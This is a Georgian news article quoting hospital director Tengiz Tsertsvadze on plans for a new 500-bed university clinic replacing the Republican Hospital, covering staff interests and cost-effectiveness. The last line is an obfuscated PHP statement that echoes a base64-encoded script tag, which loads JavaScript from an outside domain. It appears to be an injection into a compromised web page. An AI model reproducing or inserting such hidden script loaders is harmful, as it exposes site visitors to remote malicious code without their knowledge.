celsiusi
ავერსი შნაიდერი

„ახლანდელი რესპუბლიკური საავადმყოფოს ადგილზე, ახალი, მულტიპროფილური, მინიმუმ, 500 საწოლზე გათვლილი, თანამედროვე საუნივერსიტეტო კლინიკა რომ უნდა გაკეთდეს, ვფიქრობ, ეს არავისთვის სადავო არ არის. თავის დროზე, სამედიცინო დაწესებულებების, თითქმის, 95% კერძო სექტორის ხელში გადავიდა. ამით, დაირღვა ბალანსი და კონკურენტუნარიანი გარემო, რაც მოქალაქეებისთვის, მომსახურების ხელმისაწვდომობასა და ხარისხზე აისახა. დღეს, სახელმწიფო ამის გამოსწორებას ცდილობს. ახალი რესპუბლიკური საავადმყოფოს გაკეთება ერთ-ერთი დიდი გამოწვევაა, მაგრამ აუცილებლად უნდა გაკეთდეს, ეს საშვილიშვილო საქმეა და ამაზე კამათი არ უნდა იყოს“, - ამბობს ინფექციური საავადმყოფოს გენერალური დირექტორი, პროფესორი თენგიზ ცერცვაძე.

 

მისი თქმით, ახალი რესპუბლიკური საავადმყოფოს მნიშვნელობასთან ერთად, პრიორიტეტი უნდა იყოს კლინიკის თანამშრომლების ინტერესები.
 
 
„მიუხედავად ამ საქმის საშვილიშვილო მნიშვნელობისა, პრიორიტეტი უნდა მიენიჭოს თანამშრომელთა ინტერესებს, რომ მიიღონ ღირსეული ანაზღაურება და ღირსეული დასაქმების პირობა, რასაც მათ მოქმედი მთავრობა - ჯანდაცვის მინისტრი და პრემიერ- მინისტრი - ჰპირდება“.
 
რაც შეეხება ახალი რესპუბლიკურის შენობის საკითხს, თენგიზ ცერცვაძის განცხადებით, მხოლოდ ექსპერტების ჯგუფს შეუძლია, პასუხი გასცეს შეკითხვას, არსებული შენობების რეკონსტრუქცია-რეაბილიტაცია უნდა მოხდეს, თუ სრულიად ახალი ნაგებობები აშენდეს.
 
„ასევე, ძალიან მნიშვნელოვანია მისი ხარჯთეფექტურობა, რა დაჯდება უფრო მეტი - არსებულის რეაბილიტაცია, თუ - ახლის აშენება. ყველა ამ საკითხზე, ვიცი, რომ უკვე მუშაობენ არა მარტო ქართველი, არამედ მოწვეული, საერთაშორისო ექსპერტები.
 
როგორც უკვე დაანონსდა, პარასკევს, ჯანდაცვის მინისტრი, დეტალური პრეზენტაციით, რესპუბლიკურის თანამშრომლებისა და საზოგადოების წინაშე წარდგება და ყველა საკითხს გააცნობს მათ“, - ამბობს თენგიზ ცერცვაძე.

238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");